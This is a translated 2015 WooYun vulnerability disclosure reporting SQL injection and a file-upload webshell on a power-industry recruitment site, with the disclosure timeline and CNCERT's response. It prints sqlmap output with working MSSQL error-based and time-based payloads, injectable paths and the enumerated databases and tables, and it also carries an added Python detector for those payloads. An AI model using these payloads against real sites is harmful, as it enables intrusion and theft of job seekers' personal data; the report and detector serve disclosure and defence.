
Vulnerability summary

Defect ID: wooyun-2015-0136248

Title: Multiple SQL injections / arbitrary file upload (getshell) on the Electric Power Senior Talent Network (电力高级人才网)

Affected vendor: cncert National Internet Emergency Center

Author: me1ody

Submitted: 2015-08-30 08:41

Fixed: 2015-10-17 08:14

Published: 2015-10-17 08:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 17

Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-30: Details reported to the vendor; awaiting vendor handling
2015-09-02: cncert National Internet Emergency Center has not yet been able to reach the relevant unit; details disclosed only to the reporting agency
2015-09-12: Details disclosed to core white hats and experts in the relevant field
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to intern white hats
2015-10-17: Details disclosed to the public

Brief description:

Injection - -
Scanned for an admin backend for half a day and found none
In desperation, logged into an account
Found an arbitrary file upload
The 2 neighboring sites are also recruitment sites

Detailed description:

Affected sites

http://**.**.**.**/ weight 2, PR 4
http://**.**.**.**/ weight 1, PR 4
http://**.**.**.**/ weight 2, PR 4


Additional (bonus-point) sites: 15 in total
Injection points

http://**.**.**.**/web_joblist.aspx?CompID=20150531211633218
http://**.**.**.**/web_company.aspx?CompID=20150531211633218
http://**.**.**.**/login_jobpanduan.aspx?UserName=


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CompID (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4672=4672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('oQcS'='oQcS
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('whdK'='whdK
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] cptdb
[*] cptdb_yj
[*] dddb
[*] dlwebdb
[*] FinanceSystemDB
[*] fyh_cptdb
[*] fyh_xsdydb
[*] hbdb
[*] master
[*] model
[*] msdb
[*] tempdb
Database: dlwebdb
[61 tables]
+--------------------+
| Table1 |
| bjxJobList |
| bjxJobList2 |
| dtproperties |
| gj_agreeaddno |
| gj_agreement |
| gj_areainfo |
| gj_bbscoluminfo |
| gj_bbsinfo |
| gj_bbsrecinfo |
| gj_bbstotallist |
| gj_bbsuserlist |
| gj_checkinfo |
| gj_checksetup |
| gj_compaddno |
| gj_companyinfo |
| gj_companyinfo_bak |
| gj_compjob |
| gj_compjob_bak |
| gj_complookjob |
| gj_compproperty |
| gj_educationinfo |
| gj_headhunter |
| gj_jobaddno |
| gj_jobeducation |
| gj_jobhistory |
| gj_jobinfo |
| gj_jobinfo_bak |
| gj_jobkeyinfo |
| gj_jobkeyinfo1 |
| gj_jobkeyinfo2 |
| gj_jobkeyinfo3 |
| gj_jobkeylist |
| gj_jobkeyword |
| gj_jobtxtlist |
| gj_mybook |
| gj_myjoblist |
| gj_nbwebinfo |
| gj_posaddno |
| gj_posinfo |
| gj_positioninfo |
| gj_remark |
| gj_report |
| gj_specialinfo |
| gj_userconnect |
| gj_userinfo |
| gj_userlist |
| gj_webcol |
| gj_webinfo |
| myTableInfo |
| myTableJobinfo |
| myTableList |
| myTableLook |
| myTablejobedu |
| myTablejobhistory |
| myepjoblist |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
+--------------------+
Database: dlwebdb
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| dbo.gj_jobkeyword | 1421129 |
| dbo.gj_bbsinfo | 144719 |
| dbo.gj_compjob | 117943 |
| dbo.gj_remark | 94180 |
| dbo.gj_jobhistory | 90560 |
| dbo.gj_jobaddno | 66778 |
| dbo.gj_userlist | 63111 |
| dbo.gj_jobeducation | 58931 |
| dbo.gj_jobinfo | 56439 |
| dbo.gj_posaddno | 51275 |
| dbo.gj_positioninfo | 50539 |
| dbo.gj_jobkeyinfo | 49454 |
| dbo.gj_jobtxtlist | 30864 |
| dbo.myTableInfo | 26888 |
| dbo.gj_complookjob | 23236 |
| dbo.Table1 | 21656 |
| dbo.gj_report | 17062 |
| dbo.gj_webinfo | 13036 |
| dbo.myTableList | 12634 |
| dbo.gj_compaddno | 9122 |
| dbo.gj_agreement | 8057 |
| dbo.gj_companyinfo | 8009 |
| dbo.gj_agreeaddno | 7674 |
| dbo.gj_checkinfo | 4719 |
| dbo.myepjoblist | 4090 |
| dbo.myTablejobhistory | 2451 |
| dbo.gj_bbsuserlist | 2358 |
| dbo.myTablejobedu | 1870 |
| dbo.myTableJobinfo | 1845 |
| dbo.gj_mybook | 1702 |
| dbo.gj_bbstotallist | 1319 |
| dbo.gj_jobkeylist | 1117 |
| dbo.gj_bbsrecinfo | 1013 |
| dbo.bjxJobList2 | 999 |
| dbo.gj_companyinfo_bak | 990 |
| dbo.gj_areainfo | 824 |
| dbo.myTableLook | 531 |
| dbo.gj_compjob_bak | 356 |
| dbo.gj_specialinfo | 315 |
| dbo.gj_jobinfo_bak | 287 |
| dbo.gj_posinfo | 187 |
| dbo.gj_myjoblist | 183 |
| dbo.gj_compproperty | 97 |
| dbo.gj_bbscoluminfo | 31 |
| dbo.gj_nbwebinfo | 27 |
| dbo.gj_userinfo | 23 |
| dbo.gj_userconnect | 22 |
| dbo.gj_webcol | 12 |
| dbo.gj_educationinfo | 10 |
| dbo.gj_checksetup | 6 |
| dbo.gj_headhunter | 5 |
+------------------------+---------+
Database: dlwebdb
Table: gj_userlist
[9 entries]
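
The following is an added example, not part of the original report: a Python detector that flags, in IIS-style access logs, the two payload classes sqlmap reported above (the error-based CONVERT/CHAR probe and the heavy-query time-based blind probe against sysusers). The W3C field order and the log lines are constructed for the example; only the two payload strings are taken from the sqlmap output.

```python
"""Added example: flag the two sqlmap payload classes from this report in IIS-style access logs."""
import re
from urllib.parse import quote, unquote_plus

# Error-based: CONVERT(INT, ...CHAR(n)+CHAR(n)...) forces a conversion error whose message
# echoes the probe string, so each request leaks the CASE result (CHAR(49)/CHAR(48) = '1'/'0').
ERROR_BASED = re.compile(r"CONVERT\s*\(\s*INT\s*,.*?(?:CHAR\s*\(\s*\d+\s*\)\s*\+\s*){2,}", re.I | re.S)
# Time-based blind (heavy query): sysusers self-joined many times purely to burn CPU time.
HEAVY_QUERY = re.compile(r"(?:\bsysusers\s+AS\s+\w+\s*,?\s*){3,}", re.I)
CHAR_CALL = re.compile(r"CHAR\s*\(\s*(\d+)\s*\)", re.I)

def decode_char_chain(sql):
    """Render CHAR(113)+CHAR(98)+... as text (both CASE branches are included)."""
    return "".join(chr(int(n)) for n in CHAR_CALL.findall(sql))

def classify(query_string):
    """Return (techniques, decoded query) for one URL-encoded cs-uri-query value."""
    decoded = unquote_plus(query_string)
    hits = [name for name, rx in (("error-based", ERROR_BASED),
                                  ("time-based-heavy-query", HEAVY_QUERY)) if rx.search(decoded)]
    return hits, decoded

def scan_iis_log(lines):
    """Assumed W3C field order: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status."""
    findings = []
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) < 7:
            continue
        stem, query, client, status = parts[3:7]
        hits, decoded = classify(query)
        if hits:
            findings.append({"client": client, "stem": stem, "status": status, "techniques": hits,
                             "marker": decode_char_chain(decoded) if "error-based" in hits else ""})
    return findings

# Payloads copied from the sqlmap output above; the surrounding log lines are constructed.
ERROR_PAYLOAD = ("CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)"
                 "+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4672=4672) THEN CHAR(49) ELSE CHAR(48) END))"
                 "+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('oQcS'='oQcS")
HEAVY_PAYLOAD = ("CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,"
                 "sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)"
                 " AND ('whdK'='whdK")
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2015-08-29 22:10:01 GET /web_joblist.aspx CompID=20150531211633218 203.0.113.7 200",
    "2015-08-29 22:10:03 GET /web_joblist.aspx " + quote(ERROR_PAYLOAD, safe="=&") + " 203.0.113.7 500",
    "2015-08-29 22:10:09 GET /web_joblist.aspx " + quote(HEAVY_PAYLOAD, safe="=&") + " 203.0.113.7 200",
]
```

The decoded marker shows the sqlmap prefix/suffix strings (qbbkq / qzjbq) wrapped around the CASE result, which is what an application error page would have echoed back; a 500 response paired with such a query is the signal to alert on.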


Scanned for an admin backend for half a day and found none
In desperation, logged into an account
Found an arbitrary file upload
getshell

[Screenshots: 0.png, 1.png, 2.png, 3.png]


The database can be downloaded and other drives can be traversed; the 2 neighboring sites are also recruitment sites, so I won't download the database for screenshots. Extremely harmful.

Proof of vulnerability:

[Screenshots: 0.png, 1.png, 2.png, 3.png]

Remediation:

Please take this seriously
Several hundred thousand resumes

Copyright notice: when republishing, please credit the source: me1ody@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-02 08:13

Vendor reply:

CNVD confirmed and reproduced the reported situation; it has been forwarded via CNCERT to the energy industry's informatization authority, which will subsequently attempt to coordinate handling with the site's administering unit.

Latest status:

None yet